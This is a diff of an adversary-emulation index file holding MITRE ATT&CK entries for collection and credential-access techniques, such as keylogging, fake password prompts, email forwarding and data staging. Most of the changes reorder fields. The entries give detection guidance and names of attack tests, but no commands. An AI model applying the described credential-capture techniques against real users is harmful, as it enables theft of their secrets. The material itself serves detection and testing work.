source_name: MSDN Clipboard
- - url: http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/
+ - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
12, 2017.
source_name: Operating with EmPyre
@@ -46645,20 +48127,20 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-23T23:55:08.013Z'
+ modified: '2020-04-23T18:35:58.230Z'
created: '2017-05-31T21:31:25.967Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - API monitoring
- x_mitre_detection: Access to the clipboard is a legitimate function of many
- applications on an operating system. If an organization chooses to monitor
- for this behavior, then the data will likely need to be correlated against
- other suspicious or non-user-driven activity.
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: false
+ x_mitre_detection: Access to the clipboard is a legitimate function of many
+ applications on an operating system. If an organization chooses to monitor
+ for this behavior, then the data will likely need to be correlated against
+ other suspicious or non-user-driven activity.
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '1.1'
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
@@ -46723,19 +48205,19 @@ collection:
phase_name: collection
modified: '2020-03-24T16:42:09.222Z'
created: '2020-02-14T13:09:51.004Z'
- x_mitre_platforms:
- - SaaS
- x_mitre_data_sources:
- - Third-party application logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Third-party application logs
+ - Authentication logs
+ x_mitre_platforms:
+ - SaaS
atomic_tests: []
T1056.004:
technique:
@@ -46816,19 +48298,6 @@ collection:
phase_name: credential-access
modified: '2020-03-24T21:29:13.565Z'
created: '2020-02-11T19:01:15.930Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -46836,6 +48305,19 @@ collection:
- DLL monitoring
- Binary file metadata
- API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -46875,6 +48357,8 @@ collection:
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
external_references:
- source_name: mitre-attack
@@ -46884,23 +48368,22 @@ collection:
description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
April 5, 2017.
url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T17:26:16.286Z'
+ modified: '2020-06-24T18:59:16.039Z'
created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
x_mitre_platforms:
- Linux
- macOS
@@ -46908,10 +48391,15 @@ collection:
- AWS
- GCP
- Azure
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
atomic_tests: []
T1530:
technique:
@@ -46958,28 +48446,29 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-10-22T20:02:00.249Z'
+ modified: '2020-07-09T14:02:05.276Z'
created: '2019-08-30T18:07:27.741Z'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Netskope
+ - Praetorian
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
permissions are set that is allowing access to data. Additionally, detecting
failed attempts by a user for a certain object, followed by escalation of
privileges by the same user, and access to the same object may be an indication
of suspicious activity.
- x_mitre_contributors:
- - Netskope
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
atomic_tests: []
T1213:
technique:
@@ -47013,7 +48502,7 @@ collection:
* Source code snippets
* Links to network shares and other internal resources
- Information stored in a repository may vary based on specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001).
+ Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
name: Data from Information Repositories
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
@@ -47021,23 +48510,13 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T16:42:09.364Z'
+ modified: '2020-06-30T22:50:06.087Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - SaaS
- - AWS
- - GCP
- - Azure
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Praetorian
+ - Milos Stojadinovic
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -47047,35 +48526,43 @@ collection:
- Authentication logs
- Data loss prevention
- Third-party application logs
- x_mitre_contributors:
- - Praetorian
- - Milos Stojadinovic
- x_mitre_version: '2.1'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - SaaS
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
atomic_tests: []
T1005:
technique:
- id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Local System
- description: |
- Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
-
- Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ created: '2017-05-31T21:30:20.537Z'
+ modified: '2020-05-26T19:21:25.974Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1005
external_id: T1005
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:40:46.979Z'
- created: '2017-05-31T21:30:20.537Z'
- x_mitre_contributors:
- - Praetorian
+ description: |
+ Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
+
+ Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ name: Data from Local System
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
x_mitre_version: '1.2'
x_mitre_data_sources:
- File monitoring
@@ -47093,9 +48580,6 @@ collection:
- Linux
- macOS
- Windows
- - GCP
- - AWS
- - Azure
x_mitre_is_subtechnique: false
atomic_tests: []
T1039:
@@ -47124,24 +48608,24 @@ collection:
phase_name: collection
modified: '2020-03-24T15:42:44.026Z'
created: '2017-05-31T21:30:41.022Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access network shared drive
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a network share. Remote access tools
with built-in features may interact directly with the Windows API to gather
data. Data may also be acquired through Windows system management tools such
as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access network shared drive
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
atomic_tests: []
T1025:
technique:
@@ -47167,24 +48651,24 @@ collection:
phase_name: collection
modified: '2020-03-24T15:44:46.584Z'
created: '2017-05-31T21:30:31.584Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access removable media drive and files
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access removable media drive and files
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
atomic_tests: []
T1114:
technique:
@@ -47211,15 +48695,14 @@ collection:
phase_name: collection
modified: '2020-03-24T18:31:06.417Z'
created: '2017-05-31T21:31:25.454Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Office 365 trace logs
- - Mail server
- - Email gateway
- - Authentication logs
- - File monitoring
- - Process monitoring
- - Process use of network
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -47230,14 +48713,15 @@ collection:
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Office 365 trace logs
+ - Mail server
+ - Email gateway
+ - Authentication logs
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '2.1'
atomic_tests: []
T1114.003:
technique:
@@ -47278,25 +48762,25 @@ collection:
phase_name: collection
modified: '2020-03-24T18:29:48.994Z'
created: '2020-02-19T18:54:47.103Z'
- x_mitre_platforms:
- - Office 365
- - Windows
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
x_mitre_data_sources:
- Process use of network
- Process monitoring
- Email gateway
- Mail server
- Office 365 trace logs
- x_mitre_detection: |-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_platforms:
+ - Office 365
+ - Windows
atomic_tests: []
T1056.002:
technique:
@@ -47350,24 +48834,24 @@ collection:
phase_name: credential-access
modified: '2020-03-24T20:56:14.853Z'
created: '2020-02-11T18:58:45.908Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
x_mitre_data_sources:
- PowerShell logs
- User interface
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -47435,22 +48919,9 @@ collection:
phase_name: credential-access
modified: '2020-03-24T21:29:13.900Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
- Windows Registry
- Windows event logs
@@ -47463,12 +48934,39 @@ collection:
- DLL monitoring
- Binary file metadata
- API monitoring
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_version: '1.1'
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1056.001:
technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: |-
+ Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
+
+ Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
+
+ * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
+ * Reading raw keystroke data from the hardware buffer.
+ * Windows Registry modifications.
+ * Custom drivers.
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.001
@@ -47480,20 +48978,6 @@ collection:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Keylogging
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -47634,26 +49118,26 @@ collection:
phase_name: collection
modified: '2020-03-31T13:54:08.239Z'
created: '2020-02-11T19:08:51.677Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1074.001:
technique:
@@ -47675,25 +49159,22 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T16:38:51.557Z'
+ modified: '2020-05-26T19:23:54.854Z'
created: '2020-03-13T21:13:10.467Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.bat
@@ -47764,6 +49245,21 @@ collection:
name: powershell
T1114.001:
technique:
+ created: '2020-02-19T18:46:06.098Z'
+ modified: '2020-03-24T17:59:20.983Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
+ description: |-
